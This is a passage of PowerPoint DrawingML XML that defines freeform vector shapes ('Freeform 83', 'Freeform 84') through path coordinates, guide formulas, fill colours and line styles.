                    <a:lnTo>
                      <a:pt x="62" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="48"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="213" y="152"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="216" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="152"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36351" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2998" y="3304"/>
                <a:ext cx="262" cy="232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 262"/>
                  <a:gd name="T1" fmla="*/ 54 h 232"/>
                  <a:gd name="T2" fmla="*/ 69 w 262"/>
                  <a:gd name="T3" fmla="*/ 72 h 232"/>
                  <a:gd name="T4" fmla="*/ 68 w 262"/>
                  <a:gd name="T5" fmla="*/ 82 h 232"/>
                  <a:gd name="T6" fmla="*/ 83 w 262"/>
                  <a:gd name="T7" fmla="*/ 82 h 232"/>
                  <a:gd name="T8" fmla="*/ 98 w 262"/>
                  <a:gd name="T9" fmla="*/ 71 h 232"/>
                  <a:gd name="T10" fmla="*/ 105 w 262"/>
                  <a:gd name="T11" fmla="*/ 56 h 232"/>
                  <a:gd name="T12" fmla="*/ 118 w 262"/>
                  <a:gd name="T13" fmla="*/ 60 h 232"/>
                  <a:gd name="T14" fmla="*/ 133 w 262"/>
                  <a:gd name="T15" fmla="*/ 65 h 232"/>
                  <a:gd name="T16" fmla="*/ 144 w 262"/>
                  <a:gd name="T17" fmla="*/ 63 h 232"/>
                  <a:gd name="T18" fmla="*/ 150 w 262"/>
                  <a:gd name="T19" fmla="*/ 52 h 232"/>
                  <a:gd name="T20" fmla="*/ 160 w 262"/>
                  <a:gd name="T21" fmla="*/ 42 h 232"/>
                  <a:gd name="T22" fmla="*/ 168 w 262"/>
                  <a:gd name="T23" fmla="*/ 32 h 232"/>
                  <a:gd name="T24" fmla="*/ 177 w 262"/>
                  <a:gd name="T25" fmla="*/ 22 h 232"/>
                  <a:gd name="T26" fmla="*/ 189 w 262"/>
                  <a:gd name="T27" fmla="*/ 9 h 232"/>
                  <a:gd name="T28" fmla="*/ 200 w 262"/>
                  <a:gd name="T29" fmla="*/ 6 h 232"/>
                  <a:gd name="T30" fmla="*/ 205 w 262"/>
                  <a:gd name="T31" fmla="*/ 0 h 232"/>
                  <a:gd name="T32" fmla="*/ 222 w 262"/>
                  <a:gd name="T33" fmla="*/ 5 h 232"/>
                  <a:gd name="T34" fmla="*/ 231 w 262"/>
                  <a:gd name="T35" fmla="*/ 4 h 232"/>
                  <a:gd name="T36" fmla="*/ 238 w 262"/>
                  <a:gd name="T37" fmla="*/ 8 h 232"/>
                  <a:gd name="T38" fmla="*/ 245 w 262"/>
                  <a:gd name="T39" fmla="*/ 30 h 232"/>
                  <a:gd name="T40" fmla="*/ 249 w 262"/>
                  <a:gd name="T41" fmla="*/ 48 h 232"/>
                  <a:gd name="T42" fmla="*/ 249 w 262"/>
                  <a:gd name="T43" fmla="*/ 68 h 232"/>
                  <a:gd name="T44" fmla="*/ 232 w 262"/>
                  <a:gd name="T45" fmla="*/ 72 h 232"/>
                  <a:gd name="T46" fmla="*/ 233 w 262"/>
                  <a:gd name="T47" fmla="*/ 85 h 232"/>
                  <a:gd name="T48" fmla="*/ 243 w 262"/>
                  <a:gd name="T49" fmla="*/ 92 h 232"/>
                  <a:gd name="T50" fmla="*/ 248 w 262"/>
                  <a:gd name="T51" fmla="*/ 86 h 232"/>
                  <a:gd name="T52" fmla="*/ 253 w 262"/>
                  <a:gd name="T53" fmla="*/ 84 h 232"/>
                  <a:gd name="T54" fmla="*/ 259 w 262"/>
                  <a:gd name="T55" fmla="*/ 100 h 232"/>
                  <a:gd name="T56" fmla="*/ 254 w 262"/>
                  <a:gd name="T57" fmla="*/ 104 h 232"/>
                  <a:gd name="T58" fmla="*/ 253 w 262"/>
                  <a:gd name="T59" fmla="*/ 115 h 232"/>
                  <a:gd name="T60" fmla="*/ 237 w 262"/>
                  <a:gd name="T61" fmla="*/ 130 h 232"/>
                  <a:gd name="T62" fmla="*/ 214 w 262"/>
                  <a:gd name="T63" fmla="*/ 164 h 232"/>
                  <a:gd name="T64" fmla="*/ 190 w 262"/>
                  <a:gd name="T65" fmla="*/ 189 h 232"/>
                  <a:gd name="T66" fmla="*/ 169 w 262"/>
                  <a:gd name="T67" fmla="*/ 207 h 232"/>
                  <a:gd name="T68" fmla="*/ 151 w 262"/>
                  <a:gd name="T69" fmla="*/ 210 h 232"/>
                  <a:gd name="T70" fmla="*/ 147 w 262"/>
                  <a:gd name="T71" fmla="*/ 215 h 232"/>
                  <a:gd name="T72" fmla="*/ 139 w 262"/>
                  <a:gd name="T73" fmla="*/ 214 h 232"/>
                  <a:gd name="T74" fmla="*/ 133 w 262"/>
                  <a:gd name="T75" fmla="*/ 219 h 232"/>
                  <a:gd name="T76" fmla="*/ 123 w 262"/>
                  <a:gd name="T77" fmla="*/ 216 h 232"/>
                  <a:gd name="T78" fmla="*/ 112 w 262"/>
                  <a:gd name="T79" fmla="*/ 215 h 232"/>
                  <a:gd name="T80" fmla="*/ 101 w 262"/>
                  <a:gd name="T81" fmla="*/ 215 h 232"/>
                  <a:gd name="T82" fmla="*/ 90 w 262"/>
                  <a:gd name="T83" fmla="*/ 218 h 232"/>
                  <a:gd name="T84" fmla="*/ 77 w 262"/>
                  <a:gd name="T85" fmla="*/ 223 h 232"/>
                  <a:gd name="T86" fmla="*/ 62 w 262"/>
                  <a:gd name="T87" fmla="*/ 225 h 232"/>
                  <a:gd name="T88" fmla="*/ 47 w 262"/>
                  <a:gd name="T89" fmla="*/ 222 h 232"/>
                  <a:gd name="T90" fmla="*/ 40 w 262"/>
                  <a:gd name="T91" fmla="*/ 221 h 232"/>
                  <a:gd name="T92" fmla="*/ 35 w 262"/>
                  <a:gd name="T93" fmla="*/ 219 h 232"/>
                  <a:gd name="T94" fmla="*/ 31 w 262"/>
                  <a:gd name="T95" fmla="*/ 217 h 232"/>
                  <a:gd name="T96" fmla="*/ 28 w 262"/>
                  <a:gd name="T97" fmla="*/ 198 h 232"/>
                  <a:gd name="T98" fmla="*/ 26 w 262"/>
                  <a:gd name="T99" fmla="*/ 192 h 232"/>
                  <a:gd name="T100" fmla="*/ 32 w 262"/>
                  <a:gd name="T101" fmla="*/ 181 h 232"/>
                  <a:gd name="T102" fmla="*/ 25 w 262"/>
                  <a:gd name="T103" fmla="*/ 162 h 232"/>
                  <a:gd name="T104" fmla="*/ 12 w 262"/>
                  <a:gd name="T105" fmla="*/ 134 h 232"/>
                  <a:gd name="T106" fmla="*/ 0 w 262"/>
                  <a:gd name="T107" fmla="*/ 112 h 232"/>
                  <a:gd name="T108" fmla="*/ 8 w 262"/>
                  <a:gd name="T109" fmla="*/ 106 h 232"/>
                  <a:gd name="T110" fmla="*/ 13 w 262"/>
                  <a:gd name="T111" fmla="*/ 104 h 232"/>
                  <a:gd name="T112" fmla="*/ 19 w 262"/>
                  <a:gd name="T113" fmla="*/ 111 h 232"/>
                  <a:gd name="T114" fmla="*/ 26 w 262"/>
                  <a:gd name="T115" fmla="*/ 118 h 232"/>
                  <a:gd name="T116" fmla="*/ 41 w 262"/>
                  <a:gd name="T117" fmla="*/ 119 h 232"/>
                  <a:gd name="T118" fmla="*/ 52 w 262"/>
                  <a:gd name="T119" fmla="*/ 112 h 232"/>
                  <a:gd name="T120" fmla="*/ 56 w 262"/>
                  <a:gd name="T121" fmla="*/ 90 h 23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62"/>
                  <a:gd name="T184" fmla="*/ 0 h 232"/>
                  <a:gd name="T185" fmla="*/ 262 w 262"/>
                  <a:gd name="T186" fmla="*/ 232 h 232"/>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62" h="232">
                    <a:moveTo>
                      <a:pt x="56" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="60" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="48"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36352" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2968" y="3314"/>
                <a:ext cx="6" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 6"/>
                  <a:gd name="T1" fmla="*/ 0 h 11"/>
                  <a:gd name="T2" fmla="*/ 6 w 6"/>
                  <a:gd name="T3" fmla="*/ 0 h 11"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 6 h 11"/>
                  <a:gd name="T6" fmla="*/ 6 w 6"/>
                  <a:gd name="T7" fmla="*/ 11 h 11"/>
                  <a:gd name="T8" fmla="*/ 0 w 6"/>
                  <a:gd name="T9" fmla="*/ 11 h 11"/>
                  <a:gd name="T10" fmla="*/ 0 w 6"/>
                  <a:gd name="T11" fmla="*/ 8 h 11"/>
                  <a:gd name="T12" fmla="*/ 0 w 6"/>
                  <a:gd name="T13" fmla="*/ 5 h 11"/>
                  <a:gd name="T14" fmla="*/ 2 w 6"/>
                  <a:gd name="T15" fmla="*/ 3 h 11"/>
                  <a:gd name="T16" fmla="*/ 2 w 6"/>
